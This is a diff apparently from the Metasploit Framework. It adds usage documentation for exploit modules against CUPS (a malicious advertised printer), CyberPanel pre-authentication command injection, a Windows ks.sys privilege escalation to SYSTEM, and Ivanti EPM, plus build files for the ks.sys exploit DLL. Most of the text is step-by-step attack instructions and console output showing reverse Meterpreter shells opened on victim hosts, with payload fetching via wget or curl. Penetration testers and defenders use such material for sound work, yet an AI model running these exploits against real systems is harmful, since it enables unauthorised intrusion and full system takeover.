+7. From a victim system on the LAN, open a printer dialog. For example, browse to any web page in Firefox and press Ctrl+P.
+8. Select the malicious printer from the printer selection dropdown. When the victim has fetched the FoomaticRIP payload from the malicious IPP server, the "Print" button should become clickable.
+9. Click "Print". A new meterpreter session should open.
+
+## Options
+
+**PrinterName**
+
+The name of the malicious printer to advertise on the network. Default: PrintToPDF
+
+**SRVHOST**
+
+The local host address to listen on. This must be set to a specific interface address, not 0.0.0.0, since it's used in mDNS advertisements
+
+**SRVPORT**
+
+The local port for the IPP service. Default: 7575
+
+## Scenarios
+
+### Linux Command
+
+Note: The listener should be left running until a victim interacts with the fake printer. By default, the 'WfsDelay' stager time value is 10800 seconds, or three hours
+
+```
+[msf](Jobs:0 Agents:0) exploit(multi/misc/cups_ipp_remote_code_execution) >> show options
+
+Module options (exploit/multi/misc/cups_ipp_remote_code_execution):
+
+   Name         Current Setting  Required  Description
+   ----         ---------------  --------  -----------
+   PrinterName  PrintToPDF       yes       The printer name
+   SRVHOST                       yes       The local host to listen on (cannot be 0.0.0.0)
+   SRVPORT      7575             yes       The local port for the IPP service
+   SSL          true             no        Negotiate SSL for incoming connections
+   SSLCert                       no        Path to a custom SSL certificate (default is randomly generated)
+   URIPATH                       no        The URI to use for this exploit (default is random)
+
+
+Payload options (cmd/linux/http/x64/meterpreter_reverse_tcp):
+
+   Name                Current Setting  Required  Description
+   ----                ---------------  --------  -----------
+   FETCH_COMMAND       WGET             yes       Command to fetch payload (Accepted: CURL, FTP, TFTP, TNFTP, WGET)
+   FETCH_DELETE        false            yes       Attempt to delete the binary after execution
+   FETCH_FILENAME      JXrkCMgtG        no        Name to use on remote system when storing payload; cannot contain spaces or slashes
+   FETCH_SRVHOST                        no        Local IP to use for serving payload
+   FETCH_SRVPORT       8080             yes       Local port to use for serving payload
+   FETCH_URIPATH                        no        Local URI to use for serving payload
+   FETCH_WRITABLE_DIR  /var/tmp         yes       Remote writable dir to store payload; cannot contain spaces
+   LHOST                                yes       The listen address (an interface may be specified)
+   LPORT               4444             yes       The listen port
+
+
+Exploit target:
+
+   Id  Name
+   --  ----
+   0   Default
+
+
+
+View the full module info with the info, or info -d command.
+
+[msf](Jobs:0 Agents:0) exploit(multi/misc/cups_ipp_remote_code_execution) >> set SRVHOST 192.168.5.2
+SRVHOST => 192.168.5.2
+[msf](Jobs:0 Agents:0) exploit(multi/misc/cups_ipp_remote_code_execution) >> set LHOST 192.168.5.2
+SRVHOST => 192.168.5.2
+[msf](Jobs:0 Agents:0) exploit(multi/misc/cups_ipp_remote_code_execution) >> set SRVPORT 9596
+SRVPORT => 9596
+[msf](Jobs:0 Agents:0) exploit(multi/misc/cups_ipp_remote_code_execution) >> set PrinterName Canon
+PrinterName => Canon
+[msf](Jobs:0 Agents:0) exploit(multi/misc/cups_ipp_remote_code_execution) >> run
+[*] Exploit running as background job 1.
+[*] Exploit completed, but no session was created.
+
+[*] Started reverse TCP handler on 192.168.5.2:4444
+[msf](Jobs:1 Agents:0) exploit(multi/misc/cups_ipp_remote_code_execution) >>
+[*] IPP service started on 192.168.5.2:9596
+[*] Services started. Printer 'Canon' is being advertised
+[*] The exploit will continue listening for victim callbacks for the next 10800 seconds
+[*] Meterpreter session 1 opened (192.168.5.2:4444 -> 192.168.5.251:59248) at 2024-11-11 12:55:55 -0600
+
+[msf](Jobs:1 Agents:1) exploit(multi/misc/cups_ipp_remote_code_execution) >> sessions -i 1
+[*] Starting interaction with 1...
+
+(Meterpreter 1)(/) > sysinfo
+Computer     : 192.168.5.251
+OS           : Ubuntu 22.04 (Linux 6.5.0-18-generic)
+Architecture : x64
+BuildTuple   : x86_64-linux-musl
+Meterpreter  : x64/linux
+(Meterpreter 1)(/) > getuid
+Server username: lp
+(Meterpreter 1)(/) >
+```
@@ -0,0 +1,145 @@
+## Vulnerable Application
+
+CyberPanel is an open-source web hosting control panel based on OpenLiteSpeed.
+This module exploits two pre-authenticated remote command execution (RCE) vulnerabilities found in certain versions of CyberPanel.
+
+- **CVE-2024-51378**: The `getresetstatus` endpoint in `dns/views.py` and
+`ftp/views.py` in CyberPanel before commit `1c0c6cb` allows remote attackers to
+bypass authentication and execute arbitrary commands via `/dns/getresetstatus` or
+`/ftp/getresetstatus` by bypassing `secMiddleware`(which applies only to POST
+requests) and using shell metacharacters in the `statusfile` property.
+This vulnerability has been exploited in the wild as of October 2024 by PSAUX, affecting versions through 2.3.6 and the unpatched 2.3.7.
+
+- **CVE-2024-51567**: The `upgrademysqlstatus` endpoint in `databases/views.py` in
+CyberPanel before commit `5b08cd6` allows remote attackers to bypass authentication
+and execute arbitrary commands via `/dataBases/upgrademysqlstatus`, also by
+bypassing `secMiddleware` and using shell metacharacters in the `statusfile` property.
+This vulnerability has similarly been exploited in the wild in October 2024
+by PSAUX, impacting versions through 2.3.6 and the unpatched 2.3.7.
+
+- **CVE-2024-51568**: CyberPanel before 2.3.5 allows command
+injection via completePath in the ProcessUtilities.outputExecutioner() sink.
+This vulnerability includes unauthenticated remote code execution via shell
+metacharacters in the /filemanager/upload (aka File Manager upload) endpoint,
+exploiting shell metacharacters for arbitrary command execution.
+
+These vulnerabilities allow attackers to execute commands on the server without needing authentication.
+
+### Installation Instructions
+
+To set up a vulnerable instance of CyberPanel for testing, follow these
+instructions on an Ubuntu 18.04 server (or later).
+The example below demonstrates installation on Ubuntu 18.04, though newer versions of Ubuntu should work as well.
+
+1. First, install necessary dependencies and disable IPv6 to avoid potential network issues:
+
+```bash
+sudo su -
+apt update && apt install -y curl wget
+sysctl -w net.ipv6.conf.all.disable_ipv6=1
+sysctl -w net.ipv6.conf.default.disable_ipv6=1
+```
+
+2. Then, download and run the CyberPanel installation script:
+
+```bash
+sh <(curl https://cyberpanel.net/install.sh || wget -O - https://cyberpanel.net/install.sh)
+```
+
+3. During installation, choose the following options:
+   - Install CyberPanel: Select option `1`
+   - Install CyberPanel with OpenLiteSpeed: Select option `1`
+   - Skip full installation (choose `n`)
+   - Skip Postfix, PowerDNS, and PureFTPd installations
+   - Skip Remote MySQL setup
+   - Install CyberPanel version `2.3.4` when prompted
+   - Decline Memcached and Redis installations
+   - Decline WatchDog setup for Web service and Database service
+
+## Verification Steps
+
+1. Install CyberPanel as outlined above.
+2. Start `msfconsole`.
+3. Use the module path: `use exploit/unix/webapp/cyberpanel_preauth_rce_multi_cve`.
+4. Set the `RHOSTS` option to the target server’s IP.
+5. Run the exploit with the desired CVE (choose either `cve-2024-51567`, `cve-2024-51568` or `cve-2024-51378`).
+6. A successful exploitation should provide a shell on the target.
+
+## Options
+
+No option
+
+## Scenarios
+
+### Example: CVE-2024-51567 on CyberPanel 2.3.5 (Ubuntu 18.04)
+
+To exploit `CVE-2024-51567` and achieve remote command execution:
+
+```bash
+msf6 exploit(unix/webapp/cyberpanel_preauth_rce_multi_cve) > set action CVE-2024-51567
+action => CVE-2024-51567
+msf6 exploit(unix/webapp/cyberpanel_preauth_rce_multi_cve) > run http://192.168.1.16:8090
+
+[*] Started reverse TCP handler on 192.168.1.36:4444 
+[*] Running automatic check ("set AutoCheck false" to disable)
+[+] The target is vulnerable. Target is running CyberPanel and is vulnerable.
+[*] Sending stage (3045380 bytes) to 192.168.1.16
+[*] Meterpreter session 4 opened (192.168.1.36:4444 -> 192.168.1.16:35194) at 2024-11-21 22:26:12 +0100
+
+meterpreter > sysinfo 
+Computer     : 192.168.1.16
+OS           : Ubuntu 18.04 (Linux 5.4.0-150-generic)
+Architecture : x64
+BuildTuple   : x86_64-linux-musl
+Meterpreter  : x64/linux
+meterpreter > 
+```
+
+### Example: CVE-2024-51378 on CyberPanel 2.3.5 (Ubuntu 18.04)
+
+To exploit `CVE-2024-51378` and achieve remote command execution:
+
+```bash
+msf6 exploit(unix/webapp/cyberpanel_preauth_rce_multi_cve) > set action CVE-2024-51378
+action => CVE-2024-51378
+msf6 exploit(unix/webapp/cyberpanel_preauth_rce_multi_cve) > run http://192.168.1.16:8090
+
+[*] Started reverse TCP handler on 192.168.1.36:4444 
+[*] Running automatic check ("set AutoCheck false" to disable)
+[+] The target is vulnerable. Target is running CyberPanel and is vulnerable.
+[*] Sending stage (3045380 bytes) to 192.168.1.16
+[*] Meterpreter session 5 opened (192.168.1.36:4444 -> 192.168.1.16:39820) at 2024-11-21 22:27:06 +0100
+
+meterpreter > sysinfo 
+Computer     : 192.168.1.16
+OS           : Ubuntu 18.04 (Linux 5.4.0-150-generic)
+Architecture : x64
+BuildTuple   : x86_64-linux-musl
+Meterpreter  : x64/linux
+meterpreter > 
+```
+
+### Example: CVE-2024-51568 on CyberPanel 2.3.4 (Ubuntu 18.04)
+
+```bash
+msf6 exploit(unix/webapp/cyberpanel_preauth_rce_multi_cve) > set action CVE-2024-51568
+action => CVE-2024-51568
+msf6 exploit(unix/webapp/cyberpanel_preauth_rce_multi_cve) > run http://192.168.1.16:8090
+
+[*] Started reverse TCP handler on 192.168.1.36:4444 
+[*] Running automatic check ("set AutoCheck false" to disable)
+[*] CSRF Token retrieved: CtCqolh8EQHkik3J8sjbUxPemD9PN8j2cZ7QBIxtUN3zmHQ1sbSnXOCBVWr00kI7
+[*] CSRF Token retrieved: ExmQR7HciOpdsPRrh43NNjGNYaLbRb6pKnap4Z5onPfVGjPqCNFyehTAqIpBrSuB
+[+] The target is vulnerable. Target is running CyberPanel and is vulnerable.
+[*] CSRF Token retrieved: NMATUvqAxFW2bU5bnhvFf860BfFrj8DGMqtSXS81RbmxjifXo9sJCe1KM7933cIY
+[*] Sending stage (3045380 bytes) to 192.168.1.16
+[*] Meterpreter session 7 opened (192.168.1.36:4444 -> 192.168.1.16:46212) at 2024-11-21 22:37:00 +0100
+
+meterpreter > sysinfo 
+Computer     : 192.168.1.16
+OS           : Ubuntu 18.04 (Linux 5.4.0-150-generic)
+Architecture : x64
+BuildTuple   : x86_64-linux-musl
+Meterpreter  : x64/linux
+meterpreter > 
+```
@@ -0,0 +1,188 @@
+## Vulnerable Application
+The ks.sys driver on Windows is one of the core components of Kernel Streaming and is installed by default. There exists
+an Access Mode Mismatch LPE in this driver which can be exploited on some of the latest versions of Windows including:
+- Windows 11 22H2,
+- Windows 10 22H2
+- Windows 10 1607
+- Windows Server 2022
+- Windows Server 2016
+
+### About the Bug Class
+Access Mode Mismatch bugs in the Windows kernel center around the PreviousMode member of the `KTHREAD` structure. Every
+thread has a previous access mode associated with it. The PreviousMode is set to UserMode(1) if a user operates on a
+device or file through Nt* System Service Call, indicating that the System Service call is from the user. The PreviousMode
+is set to KernelMode(2) if for example a device driver invoking the Zw* System Service Call.
+
+RequestorMode is a similar field in the I/O Request Packet (IRP) which indicates if the original request came from
+KernelMode or UserMode. This commonly used field is typically derived from PreviousMode.
+
+### About the Vulnerability
+An application can use `IOCTL_KS_PROPERTY` to get or set properties, or to determine the properties supported by a KS
+object. An application passes `IOCTL_KS_PROPERTY` to the `ks!KsSynchronousIoControlDevice` with a few parameters:
+Major Code, Input Buffer, Input Buffer Length, Output Buffer, Output Buffer Length and Status Code. To improve
+efficiency in `IOCTL_KS_PROPERTY` of Kernel Streaming, the requests `KSPROPERTY_TYPE_SERIALIZESET` and
+`KSPROPERTY_TYPE_UNSERIALIZESET` are provided to allow users to operate on multiple properties in a single call.
+
+The vulnerability stems from the driver's use of the function `ks!KsSynchronousIoControlDevice`. There are multiple calls
+to this function throughout the driver which incorrectly hard code the RequestorMode parameter value KernelMode. The
+vulnerable function `ks!KsSynchronousIoControlDevice` can be invoked by issuing a `KSPROPERTY_TYPE_UNSERIALIZESET` request
+in which user controlled parameters are handled with KernelMode privileges specifically when the property is set to
+`KSPROPSETID_DrmAudioStream`. This provides a primitive that allows users to perform arbitrary `IOCTL_KS_PROPERTY`
+operations.
+
+To achieve EoP with this primitive first kCFG must be bypassed. By using the legitimate function `RtlSetAllBits` from
+ntoskrnl.exe, the arbitrary `IOCTL_KS_PROPERTY` operation can be turned into a arbitrary write primitive which can be used
+to achieve EoP by whatever typical method the user prefers. This module uses the write primitive to replace the
+current process token with a system token. Abusing token privileges is also an option.
+
+### Setup
+
+Install Windows 10 22H2 (before 10.0.19045.4529) on any HyperVisor other than Hyper-V. Hyper-V does not have an audio
+device by default, causing the exploit to fail.
+
+## Verification Steps
+
+1. Start msfconsole
+1. Get a user level session on an affected Windows machine
+1. Do: `use windows/local/cve_2024_35250_ks_driver`
+1. Set the `LHOST`, `LPORT`, and `SESSION` options
+1. Run the module
+1. Receive a session running in the context of the `NT AUTHORITY\SYSTEM` user.
+
+## Scenarios
+### Windows 10 22H2 (10.0 Build 19045)
+```
+msf6 exploit(windows/local/cve_2024_35250_ks_driver) > rexploit
+[*] Reloading module...
+
+[*] Started reverse TCP handler on 192.168.123.1:5555
+[*] Running automatic check ("set AutoCheck false" to disable)
+[+] The target appears to be vulnerable. ks.sys is present, Windows Version detected: Windows 10+ Build 19045
+[*] Launching notepad to   host the exploit...
+[*] The notepad path is: C:\Windows\System32\notepad.exe
+[*] The notepad pid is: 1012
+[*] Reflectively injecting the DLL into 1012...
+[*] Sending stage (201798 bytes) to 192.168.123.236
+[*] Meterpreter session 3 opened (192.168.123.1:5555 -> 192.168.123.236:49676) at 2024-11-04 09:47:50 -0800
+
+meterpreter > getuid
+Server username: NT AUTHORITY\SYSTEM
+meterpreter > sysinfo
+Computer        : DESKTOP-0OPTL76
+OS              : Windows 10 (10.0 Build 19045).
+Architecture    : x64
+System Language : en_US
+Domain          : WORKGROUP
+Logged On Users : 2
+Meterpreter     : x64/windows
+```
+
+### Windows 10 1607 (10.0 Build 14393)
+```
+msf6 exploit(windows/local/cve_2024_35250_ks_driver) > run
+
+[*] Started reverse TCP handler on 192.168.123.1:5555
+[*] Running automatic check ("set AutoCheck false" to disable)
+[+] The target appears to be vulnerable. ks.sys is present, Windows Version detected: Windows 10+ Build 14393
+[*] Launching notepad to host the exploit...
+[*] The notepad path is: C:\Windows\System32\notepad.exe
+[*] The notepad pid is: 4272
+[*] Reflectively injecting the DLL into 4272...
+[*] Sending stage (201798 bytes) to 192.168.123.240
+[*] Meterpreter session 5 opened (192.168.123.1:5555 -> 192.168.123.240:49675) at 2024-11-05 10:19:30 -0800
+
+meterpreter > getuid
+Server username: NT AUTHORITY\SYSTEM
+meterpreter > sysinfo
+Computer        : DESKTOP-4A5TFR5
+OS              : Windows 10 (10.0 Build 14393).
+Architecture    : x64
+System Language : en_US
+Domain          : WORKGROUP
+Logged On Users : 2
+Meterpreter     : x64/windows
+meterpreter >
+```
+
+### Windows 11 22H2 (10.0 Build 22621)
+```
+msf6 exploit(windows/local/cve_2024_35250_ks_driver) > run
+
+[*] Started reverse TCP handler on 192.168.123.1:5555
+[*] Running automatic check ("set AutoCheck false" to disable)
+[+] The target appears to be vulnerable. ks.sys is present, Windows Version detected: Windows 10+ Build 22621
+[*] Launching notepad to host the exploit...
+[*] The notepad path is: C:\Windows\System32\notepad.exe
+[*] The notepad pid is: 6948
+[*] Reflectively injecting the DLL into 6948...
+[*] Sending stage (201798 bytes) to 192.168.123.1
+[*] Meterpreter session 7 opened (192.168.123.1:5555 -> 192.168.123.1:52543) at 2024-11-04 11:22:59 -0800
+
+meterpreter > getuid
+Server username: NT AUTHORITY\SYSTEM
+meterpreter > sysinfo
+Computer        : MSFDEVICE
+OS              : Windows 11 (10.0 Build 22621).
+Architecture    : x64
+System Language : en_US
+Domain          : WORKGROUP
+Logged On Users : 2
+Meterpreter     : x64/windows
+meterpreter >
+```
+
+### Windows Server 2022 (10.0 Build 20348)
+```
+msf6 exploit(windows/local/cve_2024_35250_ks_driver) > rexploit
+[*] Reloading module...
+
+[*] Started reverse TCP handler on 172.16.199.1:5555
+[*] Running automatic check ("set AutoCheck false" to disable)
+[+] The target appears to be vulnerable. ks.sys is present, Windows Version detected: Windows Server 2016+ Build 20348
+[*] Launching notepad to host the exploit...
+[*] The notepad path is: C:\Windows\System32\notepad.exe
+[*] The notepad pid is: 7336
+[*] Reflectively injecting the DLL into 7336...
+[*] Sending stage (201798 bytes) to 172.16.199.132
+[*] Meterpreter session 3 opened (172.16.199.1:5555 -> 172.16.199.132:49977) at 2024-11-05 10:03:36 -0800
+
+meterpreter > getuid
+Server username: NT AUTHORITY\SYSTEM
+meterpreter > sysinfo
+Computer        : WIN-LBHI5KSJDU4
+OS              : Windows Server 2022 (10.0 Build 20348).
+Architecture    : x64
+System Language : en_US
+Domain          : WORKGROUP
+Logged On Users : 1
+Meterpreter     : x64/windows
+meterpreter >
+```
+
+### Windows Server 2016 (10.0 Build 14393)
+```
+msf6 exploit(windows/local/cve_2024_35250_ks_driver) > run
+
+[*] Started reverse TCP handler on 172.16.199.1:5555
+[*] Running automatic check ("set AutoCheck false" to disable)
+[+] The target appears to be vulnerable. ks.sys is present, Windows Version detected: Windows Server 2016+ Build 14393
+[*] Launching notepad to host the exploit...
+[*] The notepad path is: C:\Windows\System32\notepad.exe
+[*] The notepad pid is: 316
+[*] Reflectively injecting the DLL into 316...
+[*] Sending stage (201798 bytes) to 172.16.199.135
+[*] Meterpreter session 7 opened (172.16.199.1:5555 -> 172.16.199.135:49691) at 2024-11-05 13:48:17 -0800
+
+meterpreter > getuid
+Server username: NT AUTHORITY\SYSTEM
+meterpreter > sysinfo
+Computer        : WIN-4DS9S9C0JSC
+OS              : Windows Server 2016 (10.0 Build 14393).
+Architecture    : x64
+System Language : en_US
+Domain          : WORKGROUP
+Logged On Users : 1
+Meterpreter     : x64/windows
+meterpreter >
+```
+
@@ -0,0 +1,47 @@
+## Vulnerable Application
+This module leverages an unauthenticated RCE in Ivanti's EPM Agent Portal where a RPC client can invoke a method
+which will run an attacker-specified string on the remote target as NT AUTHORITY\SYSTEM.
+This vulnerability is present in versions prior to EPM 2021.1 Su4 and EPM 2022 Su2.
+
+## Verification Steps
+
+1. Install the application
+1. Determine which port the vulnerable AgentPortal service is listening on. It has a non-static value.
+   1. The port used by the AgentPortal service can be found in the registry at `HKLM\SOFTWARE\LANDesk\SharedComponents\LANDeskAgentPortal`
+   1. Or you could scan for it and probe the high ports (testing suggests it should be in the 49000 - 50000 range).
+1. Start msfconsole
+1. Do: `use exploit/windows/misc/ivanti_agent_portal_cmdexec`
+1. Set the `RPORT`, `PAYLOAD` and any payload-related options
+1. Run the module
+
+## Options
+
+## Scenarios
+
+### Ivanti 2021.1 / 11.0.4.733 on Windows Server 2022 x64
+
+```
+metasploit-framework.pr (S:3 J:0) exploit(windows/misc/ivanti_agent_portal_cmdexec) > run
+
+[*] Powershell command length: 4205
+[*] Started reverse TCP handler on 192.168.159.128:4444 
+[*] 192.168.159.130:49673 - Running automatic check ("set AutoCheck false" to disable)
+[*] 192.168.159.130:49673 - Connected to the remote end point
+[+] 192.168.159.130:49673 - The target is vulnerable.
+[*] Sending stage (176198 bytes) to 192.168.159.130
+[*] Meterpreter session 11 opened (192.168.159.128:4444 -> 192.168.159.130:53627) at 2024-10-28 17:15:09 -0400
+
+meterpreter > getuid
+Server username: NT AUTHORITY\SYSTEM
+meterpreter > sysinfo
+Computer        : WIN-NJ6DUF1OCAM
+OS              : Windows Server 2022 (10.0 Build 20348).
+Architecture    : x64
+System Language : en_US
+Domain          : WORKGROUP
+Logged On Users : 2
+Meterpreter     : x86/windows
+meterpreter > pwd
+C:\Windows\system32
+meterpreter > 
+```
@@ -0,0 +1,31 @@
+
+Microsoft Visual Studio Solution File, Format Version 12.00
+# Visual Studio Version 17
+VisualStudioVersion = 17.9.34728.123
+MinimumVisualStudioVersion = 10.0.40219.1
+Project("{8BC9CEB8-8B4A-11D0-8D11-00A0C91BC942}") = "CVE-2024-35250", "CVE-2024-35250.vcxproj", "{28C2C0C9-40D4-4DD1-818E-6CC688517DE1}"
+EndProject
+Global
+	GlobalSection(SolutionConfigurationPlatforms) = preSolution
+		Debug|x64 = Debug|x64
+		Debug|x86 = Debug|x86
+		Release|x64 = Release|x64
+		Release|x86 = Release|x86
+	EndGlobalSection
+	GlobalSection(ProjectConfigurationPlatforms) = postSolution
+		{28C2C0C9-40D4-4DD1-818E-6CC688517DE1}.Debug|x64.ActiveCfg = Debug|x64
+		{28C2C0C9-40D4-4DD1-818E-6CC688517DE1}.Debug|x64.Build.0 = Debug|x64
+		{28C2C0C9-40D4-4DD1-818E-6CC688517DE1}.Debug|x86.ActiveCfg = Debug|Win32
+		{28C2C0C9-40D4-4DD1-818E-6CC688517DE1}.Debug|x86.Build.0 = Debug|Win32
+		{28C2C0C9-40D4-4DD1-818E-6CC688517DE1}.Release|x64.ActiveCfg = Release|x64
+		{28C2C0C9-40D4-4DD1-818E-6CC688517DE1}.Release|x64.Build.0 = Release|x64
+		{28C2C0C9-40D4-4DD1-818E-6CC688517DE1}.Release|x86.ActiveCfg = Release|Win32
+		{28C2C0C9-40D4-4DD1-818E-6CC688517DE1}.Release|x86.Build.0 = Release|Win32
+	EndGlobalSection
+	GlobalSection(SolutionProperties) = preSolution
+		HideSolutionNode = FALSE
+	EndGlobalSection
+	GlobalSection(ExtensibilityGlobals) = postSolution
+		SolutionGuid = {F516170D-E947-4648-8440-505E807D5DDD}
+	EndGlobalSection
+EndGlobal
@@ -0,0 +1,237 @@
+<?xml version="1.0" encoding="utf-8"?>
+<Project DefaultTargets="Build" xmlns="http://schemas.microsoft.com/developer/msbuild/2003">
+  <ItemGroup Label="ProjectConfigurations">
+    <ProjectConfiguration Include="Debug|Win32">
+      <Configuration>Debug</Configuration>
+      <Platform>Win32</Platform>
+    </ProjectConfiguration>
+    <ProjectConfiguration Include="Release|Win32">
+      <Configuration>Release</Configuration>
+      <Platform>Win32</Platform>
+    </ProjectConfiguration>
+    <ProjectConfiguration Include="Debug|x64">
+      <Configuration>Debug</Configuration>
+      <Platform>x64</Platform>
+    </ProjectConfiguration>
+    <ProjectConfiguration Include="Release|x64">
+      <Configuration>Release</Configuration>
+      <Platform>x64</Platform>
+    </ProjectConfiguration>
+  </ItemGroup>
+  <PropertyGroup Label="Globals">
+    <VCProjectVersion>16.0</VCProjectVersion>
+    <ProjectGuid>{28c2c0c9-40d4-4dd1-818e-6cc688517de1}</ProjectGuid>
+    <Keyword>Win32Proj</Keyword>
+    <RootNamespace>CVE_2024_35250</RootNamespace>
+    <WindowsTargetPlatformVersion>10.0</WindowsTargetPlatformVersion>
+  </PropertyGroup>
+  <Import Project="$(VCTargetsPath)\Microsoft.Cpp.Default.props" />
+  <PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Debug|Win32'" Label="Configuration">
+    <ConfigurationType>DynamicLibrary</ConfigurationType>
+    <UseDebugLibraries>true</UseDebugLibraries>
+    <PlatformToolset>v142</PlatformToolset>
+    <CharacterSet>MultiByte</CharacterSet>
+  </PropertyGroup>
+  <PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Release|Win32'" Label="Configuration">
+    <ConfigurationType>DynamicLibrary</ConfigurationType>
+    <UseDebugLibraries>false</UseDebugLibraries>
+    <PlatformToolset>v142</PlatformToolset>
+    <WholeProgramOptimization>false</WholeProgramOptimization>
+    <CharacterSet>MultiByte</CharacterSet>
+  </PropertyGroup>
+  <PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Debug|x64'" Label="Configuration">
+    <ConfigurationType>DynamicLibrary</ConfigurationType>
+    <UseDebugLibraries>true</UseDebugLibraries>
+    <PlatformToolset>v142</PlatformToolset>
+    <CharacterSet>MultiByte</CharacterSet>
+  </PropertyGroup>
+  <PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Release|x64'" Label="Configuration">
+    <ConfigurationType>DynamicLibrary</ConfigurationType>
+    <UseDebugLibraries>false</UseDebugLibraries>
+    <PlatformToolset>v143</PlatformToolset>
+    <WholeProgramOptimization>false</WholeProgramOptimization>
+    <CharacterSet>MultiByte</CharacterSet>
+  </PropertyGroup>
+  <Import Project="$(VCTargetsPath)\Microsoft.Cpp.props" />
+  <ImportGroup Label="ExtensionSettings">
+  </ImportGroup>
+  <ImportGroup Label="Shared">
+  </ImportGroup>
+  <ImportGroup Label="PropertySheets" Condition="'$(Configuration)|$(Platform)'=='Debug|Win32'">
+    <Import Project="$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props" Condition="exists('$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props')" Label="LocalAppDataPlatform" />
+  </ImportGroup>
+  <ImportGroup Label="PropertySheets" Condition="'$(Configuration)|$(Platform)'=='Release|Win32'">
+    <Import Project="$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props" Condition="exists('$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props')" Label="LocalAppDataPlatform" />
+  </ImportGroup>
+  <ImportGroup Label="PropertySheets" Condition="'$(Configuration)|$(Platform)'=='Debug|x64'">
+    <Import Project="$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props" Condition="exists('$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props')" Label="LocalAppDataPlatform" />
+  </ImportGroup>
+  <ImportGroup Label="PropertySheets" Condition="'$(Configuration)|$(Platform)'=='Release|x64'">
+    <Import Project="$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props" Condition="exists('$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props')" Label="LocalAppDataPlatform" />
+  </ImportGroup>
+  <PropertyGroup Label="UserMacros" />
+  <PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Debug|Win32'">
+    <LinkIncremental>true</LinkIncremental>
+    <OutDir>$(Configuration)\$(PlatformShortName)\</OutDir>
+    <IntDir>$(Configuration)\$(PlatformShortName)\</IntDir>
+    <TargetName>$(ProjectName).$(PlatformShortName)</TargetName>
+  </PropertyGroup>
+  <PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Debug|x64'">
+    <LinkIncremental>true</LinkIncremental>
+    <OutDir>$(Configuration)\$(PlatformShortName)\</OutDir>
+    <IntDir>$(Configuration)\$(PlatformShortName)\</IntDir>
+    <TargetName>$(ProjectName).$(PlatformShortName)</TargetName>
+  </PropertyGroup>
+  <PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Release|Win32'">
+    <LinkIncremental>false</LinkIncremental>
+    <OutDir>$(Configuration)\$(PlatformShortName)\</OutDir>
+    <IntDir>$(Configuration)\$(PlatformShortName)\</IntDir>
+    <TargetName>$(ProjectName).$(PlatformShortName)</TargetName>
+    <GenerateManifest>false</GenerateManifest>
+  </PropertyGroup>
+  <PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Release|x64'">
+    <LinkIncremental>false</LinkIncremental>
+    <OutDir>$(Configuration)\$(PlatformShortName)\</OutDir>
+    <IntDir>$(Configuration)\$(PlatformShortName)\</IntDir>
+    <TargetName>$(ProjectName).$(PlatformShortName)</TargetName>
+    <GenerateManifest>false</GenerateManifest>
+  </PropertyGroup>
+  <ItemDefinitionGroup Condition="'$(Configuration)|$(Platform)'=='Debug|Win32'">
+    <ClCompile>
+      <PrecompiledHeader>NotUsing</PrecompiledHeader>
+      <WarningLevel>Level3</WarningLevel>
+      <SDLCheck>true</SDLCheck>
+      <PreprocessorDefinitions>WIN32;_DEBUG;RDLLTEMPLATE_EXPORTS;_WINDOWS;_USRDLL;%(PreprocessorDefinitions)</PreprocessorDefinitions>
+      <ConformanceMode>false</ConformanceMode>
+      <PrecompiledHeaderFile>stdafx.h</PrecompiledHeaderFile>
+      <AdditionalIncludeDirectories>..\ReflectiveDLLInjection\common;..\ReflectiveDLLInjection\dll\src;..\..\ReflectiveDLLInjection\common;..\..\ReflectiveDLLInjection\dll\src;..\..\..\ReflectiveDLLInjection\common;..\..\..\ReflectiveDLLInjection\dll\src;%(AdditionalIncludeDirectories)</AdditionalIncludeDirectories>
+      <DebugInformationFormat>ProgramDatabase</DebugInformationFormat>
+      <TreatWarningAsError>true</TreatWarningAsError>
+      <InlineFunctionExpansion>OnlyExplicitInline</InlineFunctionExpansion>
+      <StringPooling>true</StringPooling>
+      <RuntimeLibrary>MultiThreaded</RuntimeLibrary>
+      <FunctionLevelLinking>false</FunctionLevelLinking>
+    </ClCompile>
+    <Link>
+      <SubSystem>Windows</SubSystem>
+      <GenerateDebugInformation>true</GenerateDebugInformation>
+      <EnableUAC>false</EnableUAC>
+      <GenerateMapFile>true</GenerateMapFile>
+      <ProgramDatabaseFile>$(OutDir)$(TargetName).pdb</ProgramDatabaseFile>
+      <MapFileName>$(OutDir)$(TargetName).map</MapFileName>
+      <RandomizedBaseAddress>false</RandomizedBaseAddress>
+      <ImportLibrary>$(OutDir)$(ProjectName).lib</ImportLibrary>
+      <AdditionalLibraryDirectories>%(AdditionalLibraryDirectories)</AdditionalLibraryDirectories>
+    </Link>
+  </ItemDefinitionGroup>
+  <ItemDefinitionGroup Condition="'$(Configuration)|$(Platform)'=='Debug|x64'">
+    <ClCompile>
+      <WarningLevel>TurnOffAllWarnings</WarningLevel>
+      <SDLCheck>false</SDLCheck>
+      <PreprocessorDefinitions>_DEBUG;RDLLTEMPLATE_EXPORTS;_WINDOWS;_USRDLL;%(PreprocessorDefinitions)</PreprocessorDefinitions>
+      <ConformanceMode>false</ConformanceMode>
+      <PrecompiledHeaderFile>stdafx.h</PrecompiledHeaderFile>
+      <AdditionalIncludeDirectories>C:\Users\msfuser\Documents\git\metasploit-framework\external\source\include\windows\;C:\Users\msfuser\Documents\git\metasploit-framework\external\source\exploits\CVE-2024-35250\CVE-2024-35250\;..\ReflectiveDLLInjection\common;..\ReflectiveDLLInjection\dll\src;..\..\ReflectiveDLLInjection\common;..\..\ReflectiveDLLInjection\dll\src;..\..\..\ReflectiveDLLInjection\common;..\..\..\ReflectiveDLLInjection\dll\src;%(AdditionalIncludeDirectories)</AdditionalIncludeDirectories>
+      <DebugInformationFormat>ProgramDatabase</DebugInformationFormat>
+      <TreatWarningAsError>false</TreatWarningAsError>
